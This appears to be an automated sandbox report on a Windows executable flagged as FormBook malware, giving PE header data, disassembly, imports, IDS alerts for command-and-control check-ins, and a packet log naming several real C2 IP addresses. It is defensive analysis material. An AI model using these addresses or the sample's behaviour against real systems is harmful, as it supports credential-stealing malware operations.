                                                                            TLSH:98A423C55140333BC9A61F34A4393715EFACCD213814A35B9B54FB4C667B682AB4A7A3
                                                                            Icon Hash:3d2e0f95332b3399
                                                                            Entrypoint:0x4034a2
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                                                            Instruction
                                                                            sub esp, 000002D4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            push 00000020h
                                                                            pop edi
                                                                            xor ebx, ebx
                                                                            push 00008001h
                                                                            mov dword ptr [esp+14h], ebx
                                                                            mov dword ptr [esp+10h], 0040A2E0h
                                                                            mov dword ptr [esp+1Ch], ebx
                                                                            call dword ptr [004080CCh]
                                                                            call dword ptr [004080D0h]
                                                                            and eax, BFFFFFFFh
                                                                            cmp ax, 00000006h
                                                                            mov dword ptr [007A8A6Ch], eax
                                                                            je 00007F54F1010C93h
                                                                            push ebx
                                                                            call 00007F54F1013F81h
                                                                            cmp eax, ebx
                                                                            je 00007F54F1010C89h
                                                                            push 00000C00h
                                                                            call eax
                                                                            mov esi, 004082B0h
                                                                            push esi
                                                                            call 00007F54F1013EFBh
                                                                            push esi
                                                                            call dword ptr [00408154h]
                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                            cmp byte ptr [esi], 00000000h
                                                                            jne 00007F54F1010C6Ch
                                                                            push 0000000Bh
                                                                            call 00007F54F1013F54h
                                                                            push 00000009h
                                                                            call 00007F54F1013F4Dh
                                                                            push 00000007h
                                                                            mov dword ptr [007A8A64h], eax
                                                                            call 00007F54F1013F41h
                                                                            cmp eax, ebx
                                                                            je 00007F54F1010C91h
                                                                            push 0000001Eh
                                                                            call eax
                                                                            test eax, eax
                                                                            je 00007F54F1010C89h
                                                                            or byte ptr [007A8A6Fh], 00000040h
                                                                            push ebp
                                                                            call dword ptr [00408038h]
                                                                            push ebx
                                                                            call dword ptr [00408298h]
                                                                            mov dword ptr [007A8B38h], eax
                                                                            push ebx
                                                                            lea eax, dword ptr [esp+34h]
                                                                            push 000002B4h
                                                                            push eax
                                                                            push ebx
                                                                            push 0079FF08h
                                                                            call dword ptr [0040818Ch]
                                                                            push 0040A2C8h
                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c7000 | 0xb48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x656c | 0x6600 | 12117ad2476c7a7912407af0dcfcb8a7 | False | 0.6737515318627451 | data | 6.47208759712619 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1398 | 0x1400 | e3e8d62e1d2308b175349eb9daa266c8 | False | 0.4494140625 | data | 5.137750894959169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39eb78 | 0x600 | 2020ca26e010546720fd467c5d087b57 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c7000 | 0xb48 | 0xc00 | 13d9a87cc14830e1f01c641a62386bbe | False | 0.4215494791666667 | data | 4.357284806500026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c71c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894
RT_DIALOG | 0x3c74a8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3c75a8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3c76c8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3c7790 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3c77f0 | 0x14 | data | English | United States | 1.2
RT_MANIFEST | 0x3c7808 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                            2024-12-03T18:58:50.141283+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980713.248.169.4880TCP
                                                                            2024-12-03T18:58:52.821550+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980813.248.169.4880TCP
                                                                            2024-12-03T18:58:58.206606+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981013.248.169.4880TCP
                                                                            2024-12-03T18:59:03.599772+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049811209.74.77.10980TCP
                                                                            2024-12-03T18:59:06.317034+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049812209.74.77.10980TCP
                                                                            2024-12-03T18:59:09.041640+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049813209.74.77.10980TCP
                                                                            2024-12-03T18:59:11.753182+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049814209.74.77.10980TCP
                                                                            2024-12-03T18:59:17.325482+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981523.225.159.4280TCP
                                                                            2024-12-03T18:59:20.046254+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981623.225.159.4280TCP
                                                                            2024-12-03T18:59:22.765576+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981723.225.159.4280TCP
                                                                            2024-12-03T18:59:25.482700+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981823.225.159.4280TCP
                                                                            2024-12-03T18:59:30.998158+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981946.30.211.3880TCP
                                                                            2024-12-03T18:59:33.749854+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982046.30.211.3880TCP
                                                                            2024-12-03T18:59:36.548323+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982146.30.211.3880TCP
                                                                            2024-12-03T18:59:39.298041+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204982246.30.211.3880TCP
                                                                            2024-12-03T18:59:44.713906+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049823103.224.182.24280TCP
                                                                            2024-12-03T18:59:47.417194+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049824103.224.182.24280TCP
                                                                            2024-12-03T18:59:50.135369+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049825103.224.182.24280TCP
                                                                            2024-12-03T18:59:52.856997+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049826103.224.182.24280TCP
                                                                            2024-12-03T18:59:58.551125+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049827149.88.81.19080TCP
                                                                            2024-12-03T19:00:01.416649+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049828149.88.81.19080TCP
                                                                            2024-12-03T19:00:04.296824+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049829149.88.81.19080TCP
                                                                            2024-12-03T19:00:07.185737+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049830149.88.81.19080TCP
                                                                            2024-12-03T19:00:12.886351+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049831101.35.209.18380TCP
                                                                            2024-12-03T19:00:15.740889+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049832101.35.209.18380TCP
                                                                            2024-12-03T19:00:18.603530+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049833101.35.209.18380TCP
                                                                            2024-12-03T19:00:21.476589+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049834101.35.209.18380TCP
                                                                            2024-12-03T19:00:27.215292+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983538.47.232.20280TCP
                                                                            2024-12-03T19:00:30.112224+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983638.47.232.20280TCP
                                                                            2024-12-03T19:00:32.958544+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983738.47.232.20280TCP
                                                                            2024-12-03T19:00:35.826457+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983838.47.232.20280TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Dec 3, 2024 18:55:19.256819963 CET804975313.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:19.257390976 CET4975380192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:19.257813931 CET4975380192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:19.412666082 CET804975313.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:24.467616081 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:24.657720089 CET8049754209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:24.657958031 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:24.661668062 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:24.850106955 CET8049754209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:24.856693983 CET8049754209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:24.856713057 CET8049754209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:24.857075930 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:26.166107893 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:27.182524920 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:27.371006966 CET8049755209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:27.371444941 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:27.374723911 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:27.562988043 CET8049755209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:27.571683884 CET8049755209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:27.571702003 CET8049755209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:27.571981907 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:28.884264946 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:29.900516033 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:30.088928938 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.089267969 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:30.092909098 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:30.281513929 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.281560898 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.281591892 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.281712055 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.281744957 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.290868998 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.290925026 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.291099072 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:31.602334976 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:32.618534088 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:32.806858063 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:32.807490110 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:32.809967995 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:32.998609066 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:33.005325079 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:33.005376101 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:33.005769014 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:33.006475925 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:33.195235968 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:39.089813948 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:39.280294895 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.280658007 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:39.284168005 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:39.471441031 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.471782923 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:39.474644899 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.662285089 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.662306070 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.662480116 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:40.788017035 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:41.804287910 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:41.994932890 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:41.995160103 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:41.998610020 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:42.185931921 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:42.186125040 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:42.188839912 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:42.376255989 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:42.376349926 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:42.376533985 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:43.506125927 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.522391081 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.711276054 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:44.711683035 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.715244055 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.900614977 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:44.900976896 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.903734922 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089442968 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089453936 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089692116 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089701891 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089708090 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089734077 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:45.277770042 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.240401983 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.430413008 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.430660009 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.433063984 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.620858908 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.621149063 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.623100042 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.811270952 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.811317921 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.811594009 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.812160969 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:48.006419897 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:53.200433969 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:53.439320087 CET804976246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:53.439523935 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:53.443073034 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:53.682226896 CET804976246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:53.682337046 CET804976246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:53.682394028 CET804976246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:53.682677031 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:54.956578016 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:55.972703934 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:56.211750984 CET804976346.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:56.212071896 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:56.215830088 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:56.454921961 CET804976346.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:56.454977036 CET804976346.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:56.455013037 CET804976346.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:56.455161095 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:57.721537113 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:58.737799883 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:58.990773916 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:58.991039991 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:58.994667053 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:58.994745016 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:59.247531891 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.247560978 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.247759104 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.247987032 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.248014927 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.251279116 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.251496077 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.251794100 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:00.502270937 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:01.518343925 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:01.757821083 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:01.757980108 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:01.760416985 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:02.000009060 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:02.000062943 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:02.000098944 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:02.000339985 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:02.001044035 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:02.240288973 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:07.451188087 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:07.638350964 CET8049766103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:07.638598919 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:07.642168045 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:07.843976021 CET8049766103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:07.844024897 CET8049766103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:07.844274998 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:09.156536102 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:10.172693014 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:10.360105991 CET8049767103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:10.360256910 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:10.363874912 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:10.568619013 CET8049767103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:10.568669081 CET8049767103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:10.568828106 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:11.874634027 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:12.890857935 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:13.078408957 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.078664064 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:13.082297087 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:13.082361937 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:13.269910097 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.270044088 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.270077944 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.270386934 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.270431042 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.278017044 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.278065920 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.278283119 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:14.592931032 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.609091043 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.796427965 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:15.796612978 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.799074888 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.996423960 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:15.996474028 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:15.996511936 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:15.996802092 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.997431040 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:16.184837103 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:21.957622051 CET4977080192.168.11.20149.88.81.190
